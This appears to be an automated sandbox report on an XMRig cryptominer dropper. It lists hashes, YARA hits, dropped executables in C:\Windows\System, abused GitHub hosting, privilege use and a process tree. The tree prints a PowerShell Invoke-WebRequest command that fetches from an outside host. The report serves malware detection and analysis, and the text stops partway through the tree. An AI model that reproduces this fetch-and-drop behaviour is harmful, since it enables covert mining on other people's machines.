xmrig | 0ebd43078dc042876431735deaa757542b0dddb36dd2a1b6a54b67cf830120ab

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19/05/2024, 23:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
Size

2.9MB
MD5

560ae8f2a113c175d8bf896e3d8a78c0
SHA1

4a5aa53c96d58d42e7e3914477a6b5dc777f001f
SHA256

0ebd43078dc042876431735deaa757542b0dddb36dd2a1b6a54b67cf830120ab
SHA512

b09b4153c65d4c20142fc61ad6e90222a0f55e80ba9f004954759401ac15cb0e23a22a16f54d2b83e57ddd0649cc5cc5665bc2705691bf63018e681552e47b1a
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkFfdk2a2yKmf:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R3

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4664-0-0x00007FF762740000-0x00007FF762B36000-memory.dmp	xmrig
behavioral2/files/0x000b0000000232f0-6.dat	xmrig
behavioral2/files/0x0007000000023421-10.dat	xmrig
behavioral2/files/0x0007000000023420-11.dat	xmrig
behavioral2/files/0x0007000000023423-27.dat	xmrig
behavioral2/files/0x0007000000023422-30.dat	xmrig
behavioral2/files/0x0007000000023427-44.dat	xmrig
behavioral2/files/0x000700000002342a-66.dat	xmrig
behavioral2/files/0x000700000002342f-77.dat	xmrig
behavioral2/files/0x000800000002342c-107.dat	xmrig
behavioral2/files/0x0007000000023432-124.dat	xmrig
behavioral2/files/0x0007000000023438-143.dat	xmrig
behavioral2/memory/3480-165-0x00007FF6C8640000-0x00007FF6C8A36000-memory.dmp	xmrig
behavioral2/memory/3228-169-0x00007FF767090000-0x00007FF767486000-memory.dmp	xmrig
behavioral2/memory/4616-173-0x00007FF6B4E30000-0x00007FF6B5226000-memory.dmp	xmrig
behavioral2/memory/4512-177-0x00007FF7A98F0000-0x00007FF7A9CE6000-memory.dmp	xmrig
behavioral2/memory/2468-179-0x00007FF663540000-0x00007FF663936000-memory.dmp	xmrig
behavioral2/memory/732-178-0x00007FF71E130000-0x00007FF71E526000-memory.dmp	xmrig
behavioral2/memory/4780-176-0x00007FF643AA0000-0x00007FF643E96000-memory.dmp	xmrig
behavioral2/memory/2576-175-0x00007FF71B4D0000-0x00007FF71B8C6000-memory.dmp	xmrig
behavioral2/memory/3984-174-0x00007FF67AFB0000-0x00007FF67B3A6000-memory.dmp	xmrig
behavioral2/memory/3572-172-0x00007FF6EDB70000-0x00007FF6EDF66000-memory.dmp	xmrig
behavioral2/memory/1700-171-0x00007FF7A5200000-0x00007FF7A55F6000-memory.dmp	xmrig
behavioral2/memory/4128-170-0x00007FF7C9460000-0x00007FF7C9856000-memory.dmp	xmrig
behavioral2/memory/3908-168-0x00007FF698810000-0x00007FF698C06000-memory.dmp	xmrig
behavioral2/memory/756-167-0x00007FF768B00000-0x00007FF768EF6000-memory.dmp	xmrig
behavioral2/memory/3424-166-0x00007FF7A2D50000-0x00007FF7A3146000-memory.dmp	xmrig
behavioral2/memory/3248-164-0x00007FF75B110000-0x00007FF75B506000-memory.dmp	xmrig
behavioral2/memory/4160-163-0x00007FF6DB7E0000-0x00007FF6DBBD6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023439-161.dat	xmrig
behavioral2/files/0x000800000002341d-159.dat	xmrig
behavioral2/memory/3460-158-0x00007FF6324A0000-0x00007FF632896000-memory.dmp	xmrig
behavioral2/files/0x0007000000023437-154.dat	xmrig
behavioral2/files/0x0007000000023436-152.dat	xmrig
behavioral2/files/0x000800000002342b-150.dat	xmrig
behavioral2/files/0x0007000000023435-148.dat	xmrig
behavioral2/memory/3744-147-0x00007FF786B20000-0x00007FF786F16000-memory.dmp	xmrig
behavioral2/memory/2356-146-0x00007FF6ACB90000-0x00007FF6ACF86000-memory.dmp	xmrig
behavioral2/files/0x0007000000023434-141.dat	xmrig
behavioral2/files/0x0007000000023431-137.dat	xmrig
behavioral2/memory/4636-133-0x00007FF745BD0000-0x00007FF745FC6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023433-120.dat	xmrig
behavioral2/files/0x0007000000023430-116.dat	xmrig
behavioral2/memory/4572-113-0x00007FF7065D0000-0x00007FF7069C6000-memory.dmp	xmrig
behavioral2/memory/2992-101-0x00007FF6B3C80000-0x00007FF6B4076000-memory.dmp	xmrig
behavioral2/files/0x000700000002342e-98.dat	xmrig
behavioral2/files/0x0007000000023426-109.dat	xmrig
behavioral2/files/0x000700000002342d-105.dat	xmrig
behavioral2/files/0x0007000000023428-85.dat	xmrig
behavioral2/files/0x0007000000023429-84.dat	xmrig
behavioral2/files/0x0007000000023424-69.dat	xmrig
behavioral2/files/0x0007000000023425-56.dat	xmrig
behavioral2/files/0x0007000000023446-216.dat	xmrig
behavioral2/files/0x000700000002344b-241.dat	xmrig
behavioral2/files/0x0007000000023447-229.dat	xmrig
behavioral2/files/0x000700000002344a-232.dat	xmrig
behavioral2/files/0x000700000002343a-212.dat	xmrig
behavioral2/memory/1392-41-0x00007FF7C7750000-0x00007FF7C7B46000-memory.dmp	xmrig
behavioral2/memory/1392-2068-0x00007FF7C7750000-0x00007FF7C7B46000-memory.dmp	xmrig
behavioral2/memory/4616-2069-0x00007FF6B4E30000-0x00007FF6B5226000-memory.dmp	xmrig
behavioral2/memory/2992-2070-0x00007FF6B3C80000-0x00007FF6B4076000-memory.dmp	xmrig
behavioral2/memory/4572-2071-0x00007FF7065D0000-0x00007FF7069C6000-memory.dmp	xmrig
behavioral2/memory/4636-2072-0x00007FF745BD0000-0x00007FF745FC6000-memory.dmp	xmrig
behavioral2/memory/3984-2073-0x00007FF67AFB0000-0x00007FF67B3A6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
7	3652	powershell.exe
9	3652	powershell.exe
11	3652	powershell.exe
12	3652	powershell.exe
14	3652	powershell.exe
28	3652	powershell.exe
29	3652	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3652	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1392	UtzvYRx.exe
4616	RHPaFOM.exe
2992	kOHJROv.exe
4572	AKIJnCN.exe
4636	sadmgPo.exe
3984	lKmkiMv.exe
2356	CCXUMkE.exe
2576	jFCNrvx.exe
3744	jVVekDd.exe
3460	NFZbtwM.exe
4160	WbRzXLz.exe
3248	OXtaimO.exe
3480	ufIVAFP.exe
3424	CKkZAow.exe
756	PSMoqQE.exe
4780	KqQKEZg.exe
3908	VhEzgZz.exe
3228	pRjSGeG.exe
4128	ZnWJrwx.exe
4512	bFHEEhl.exe
1700	lJdKgPh.exe
732	BDRkbRK.exe
2468	vepCiLU.exe
3572	GlsqBFB.exe
3396	rHkwrZP.exe
2776	QptfdJh.exe
1952	HdcBfAy.exe
1960	TJlbrGv.exe
1404	jPrvlBw.exe
4472	NIeSEyD.exe
3040	LzLSEKF.exe
4844	rmocJCq.exe
1172	WZHrpaq.exe
4220	bYUYNKL.exe
856	CMkmqES.exe
2448	xHoTmEt.exe
624	bPBdIlm.exe
3152	ZvhgHNP.exe
1368	wBscwYx.exe
3900	EPbFJzG.exe
4608	anlOABV.exe
3504	ZaGGVfN.exe
3700	pIgfWFf.exe
4628	LAEnmLV.exe
2016	fBIIYFH.exe
2736	bnacbdo.exe
4944	AkLjthH.exe
2420	FlDEzCI.exe
3120	HnYUYNQ.exe
2888	aNohYhB.exe
4276	PxLQODk.exe
4560	CQkJPna.exe
3356	lLHdDtR.exe
3644	atXNyIk.exe
4788	mPtoyWZ.exe
3216	jZyBicw.exe
1852	bxUKcgH.exe
5008	OriLwci.exe
4376	SkbBsBi.exe
4140	USgVbNb.exe
3252	DPXYVdJ.exe
4828	edXCPhA.exe
1396	ZcWHIkU.exe
4440	Nunmrdp.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4664-0-0x00007FF762740000-0x00007FF762B36000-memory.dmp	upx
behavioral2/files/0x000b0000000232f0-6.dat	upx
behavioral2/files/0x0007000000023421-10.dat	upx
behavioral2/files/0x0007000000023420-11.dat	upx
behavioral2/files/0x0007000000023423-27.dat	upx
behavioral2/files/0x0007000000023422-30.dat	upx
behavioral2/files/0x0007000000023427-44.dat	upx
behavioral2/files/0x000700000002342a-66.dat	upx
behavioral2/files/0x000700000002342f-77.dat	upx
behavioral2/files/0x000800000002342c-107.dat	upx
behavioral2/files/0x0007000000023432-124.dat	upx
behavioral2/files/0x0007000000023438-143.dat	upx
behavioral2/memory/3480-165-0x00007FF6C8640000-0x00007FF6C8A36000-memory.dmp	upx
behavioral2/memory/3228-169-0x00007FF767090000-0x00007FF767486000-memory.dmp	upx
behavioral2/memory/4616-173-0x00007FF6B4E30000-0x00007FF6B5226000-memory.dmp	upx
behavioral2/memory/4512-177-0x00007FF7A98F0000-0x00007FF7A9CE6000-memory.dmp	upx
behavioral2/memory/2468-179-0x00007FF663540000-0x00007FF663936000-memory.dmp	upx
behavioral2/memory/732-178-0x00007FF71E130000-0x00007FF71E526000-memory.dmp	upx
behavioral2/memory/4780-176-0x00007FF643AA0000-0x00007FF643E96000-memory.dmp	upx
behavioral2/memory/2576-175-0x00007FF71B4D0000-0x00007FF71B8C6000-memory.dmp	upx
behavioral2/memory/3984-174-0x00007FF67AFB0000-0x00007FF67B3A6000-memory.dmp	upx
behavioral2/memory/3572-172-0x00007FF6EDB70000-0x00007FF6EDF66000-memory.dmp	upx
behavioral2/memory/1700-171-0x00007FF7A5200000-0x00007FF7A55F6000-memory.dmp	upx
behavioral2/memory/4128-170-0x00007FF7C9460000-0x00007FF7C9856000-memory.dmp	upx
behavioral2/memory/3908-168-0x00007FF698810000-0x00007FF698C06000-memory.dmp	upx
behavioral2/memory/756-167-0x00007FF768B00000-0x00007FF768EF6000-memory.dmp	upx
behavioral2/memory/3424-166-0x00007FF7A2D50000-0x00007FF7A3146000-memory.dmp	upx
behavioral2/memory/3248-164-0x00007FF75B110000-0x00007FF75B506000-memory.dmp	upx
behavioral2/memory/4160-163-0x00007FF6DB7E0000-0x00007FF6DBBD6000-memory.dmp	upx
behavioral2/files/0x0007000000023439-161.dat	upx
behavioral2/files/0x000800000002341d-159.dat	upx
behavioral2/memory/3460-158-0x00007FF6324A0000-0x00007FF632896000-memory.dmp	upx
behavioral2/files/0x0007000000023437-154.dat	upx
behavioral2/files/0x0007000000023436-152.dat	upx
behavioral2/files/0x000800000002342b-150.dat	upx
behavioral2/files/0x0007000000023435-148.dat	upx
behavioral2/memory/3744-147-0x00007FF786B20000-0x00007FF786F16000-memory.dmp	upx
behavioral2/memory/2356-146-0x00007FF6ACB90000-0x00007FF6ACF86000-memory.dmp	upx
behavioral2/files/0x0007000000023434-141.dat	upx
behavioral2/files/0x0007000000023431-137.dat	upx
behavioral2/memory/4636-133-0x00007FF745BD0000-0x00007FF745FC6000-memory.dmp	upx
behavioral2/files/0x0007000000023433-120.dat	upx
behavioral2/files/0x0007000000023430-116.dat	upx
behavioral2/memory/4572-113-0x00007FF7065D0000-0x00007FF7069C6000-memory.dmp	upx
behavioral2/memory/2992-101-0x00007FF6B3C80000-0x00007FF6B4076000-memory.dmp	upx
behavioral2/files/0x000700000002342e-98.dat	upx
behavioral2/files/0x0007000000023426-109.dat	upx
behavioral2/files/0x000700000002342d-105.dat	upx
behavioral2/files/0x0007000000023428-85.dat	upx
behavioral2/files/0x0007000000023429-84.dat	upx
behavioral2/files/0x0007000000023424-69.dat	upx
behavioral2/files/0x0007000000023425-56.dat	upx
behavioral2/files/0x0007000000023446-216.dat	upx
behavioral2/files/0x000700000002344b-241.dat	upx
behavioral2/files/0x0007000000023447-229.dat	upx
behavioral2/files/0x000700000002344a-232.dat	upx
behavioral2/files/0x000700000002343a-212.dat	upx
behavioral2/memory/1392-41-0x00007FF7C7750000-0x00007FF7C7B46000-memory.dmp	upx
behavioral2/memory/1392-2068-0x00007FF7C7750000-0x00007FF7C7B46000-memory.dmp	upx
behavioral2/memory/4616-2069-0x00007FF6B4E30000-0x00007FF6B5226000-memory.dmp	upx
behavioral2/memory/2992-2070-0x00007FF6B3C80000-0x00007FF6B4076000-memory.dmp	upx
behavioral2/memory/4572-2071-0x00007FF7065D0000-0x00007FF7069C6000-memory.dmp	upx
behavioral2/memory/4636-2072-0x00007FF745BD0000-0x00007FF745FC6000-memory.dmp	upx
behavioral2/memory/3984-2073-0x00007FF67AFB0000-0x00007FF67B3A6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\sdvbmpt.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\gEszLnO.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\pCDyqOg.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\QcAgIxc.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\KqQKEZg.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\jeDAVrA.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\TXPwBJq.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\xlMOqVK.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\ZmIciyd.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\YMUTeFJ.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\GMyETYe.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\ZqCogFm.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\MHxZvxK.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\CjNYSjX.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\GjruUDp.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\aaXfkag.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\BMSZZyb.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\IvpOYtP.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\bhNEKJD.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\qxcWaRw.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\fvnxGvL.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\hwUObbf.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\lnTLbvx.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\kazUheu.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\jxzUkHa.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\vdqiLcK.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\rTYcuks.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\ZcWHIkU.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\NTMimBH.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\HlPGXrf.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\qobWaao.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\vSxJisK.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\cHvgnhq.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\CqJQBXY.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\hpHClHM.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\pXYQUrh.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\oyNjLBZ.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\bewWISl.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\KCkdSMl.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\hyaNMdj.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\BRhWoNi.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\EpEDWZY.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\SLMlWlp.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\KnYOtFH.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\OSkRzDj.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\BMUXSfd.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\YSvajFg.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\ttgyCuk.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\dQcOaTH.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\uJruvfM.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\IJwKwwY.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\YaFNStF.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\QpvGjhq.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\sHaTMPB.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\YVlpxuf.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\zWFnCnm.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\JzijJIZ.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\lFrAyJS.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\yNPXXXf.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\MKrWwCX.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\DLkCHmA.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\Wyxgbtk.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\PjEaRIn.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
File created	C:\Windows\System\HrkFxKe.exe	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
Token: SeDebugPrivilege	3652	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4664 wrote to memory of 3652	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	86
PID 4664 wrote to memory of 3652	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	86
PID 4664 wrote to memory of 1392	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	87
PID 4664 wrote to memory of 1392	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	87
PID 4664 wrote to memory of 4616	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	88
PID 4664 wrote to memory of 4616	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	88
PID 4664 wrote to memory of 2992	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	89
PID 4664 wrote to memory of 2992	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	89
PID 4664 wrote to memory of 4572	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	90
PID 4664 wrote to memory of 4572	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	90
PID 4664 wrote to memory of 4636	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	91
PID 4664 wrote to memory of 4636	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	91
PID 4664 wrote to memory of 2356	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	92
PID 4664 wrote to memory of 2356	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	92
PID 4664 wrote to memory of 3984	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	93
PID 4664 wrote to memory of 3984	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	93
PID 4664 wrote to memory of 3460	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	94
PID 4664 wrote to memory of 3460	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	94
PID 4664 wrote to memory of 2576	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	95
PID 4664 wrote to memory of 2576	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	95
PID 4664 wrote to memory of 3744	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	96
PID 4664 wrote to memory of 3744	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	96
PID 4664 wrote to memory of 4160	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	97
PID 4664 wrote to memory of 4160	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	97
PID 4664 wrote to memory of 3248	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	98
PID 4664 wrote to memory of 3248	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	98
PID 4664 wrote to memory of 3480	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	99
PID 4664 wrote to memory of 3480	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	99
PID 4664 wrote to memory of 3424	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	100
PID 4664 wrote to memory of 3424	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	100
PID 4664 wrote to memory of 756	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	101
PID 4664 wrote to memory of 756	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	101
PID 4664 wrote to memory of 4780	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	102
PID 4664 wrote to memory of 4780	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	102
PID 4664 wrote to memory of 3908	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	103
PID 4664 wrote to memory of 3908	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	103
PID 4664 wrote to memory of 3228	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	104
PID 4664 wrote to memory of 3228	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	104
PID 4664 wrote to memory of 4128	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	105
PID 4664 wrote to memory of 4128	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	105
PID 4664 wrote to memory of 4512	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	106
PID 4664 wrote to memory of 4512	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	106
PID 4664 wrote to memory of 1700	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	107
PID 4664 wrote to memory of 1700	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	107
PID 4664 wrote to memory of 732	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	108
PID 4664 wrote to memory of 732	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	108
PID 4664 wrote to memory of 2468	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	109
PID 4664 wrote to memory of 2468	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	109
PID 4664 wrote to memory of 3572	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	110
PID 4664 wrote to memory of 3572	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	110
PID 4664 wrote to memory of 3396	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	111
PID 4664 wrote to memory of 3396	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	111
PID 4664 wrote to memory of 2776	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	112
PID 4664 wrote to memory of 2776	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	112
PID 4664 wrote to memory of 1952	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	113
PID 4664 wrote to memory of 1952	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	113
PID 4664 wrote to memory of 1960	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	114
PID 4664 wrote to memory of 1960	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	114
PID 4664 wrote to memory of 1404	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	115
PID 4664 wrote to memory of 1404	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	115
PID 4664 wrote to memory of 4472	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	116
PID 4664 wrote to memory of 4472	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	116
PID 4664 wrote to memory of 3040	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	117
PID 4664 wrote to memory of 3040	4664	560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe	117

C:\Users\Admin\AppData\Local\Temp\560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\560ae8f2a113c175d8bf896e3d8a78c0_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3652
- C:\Windows\System\UtzvYRx.exe
  C:\Windows\System\UtzvYRx.exe
  2⤵
  - Executes dropped EXE
  PID:1392
- C:\Windows\System\RHPaFOM.exe
  C:\Windows\System\RHPaFOM.exe
  2⤵
  - Executes dropped EXE
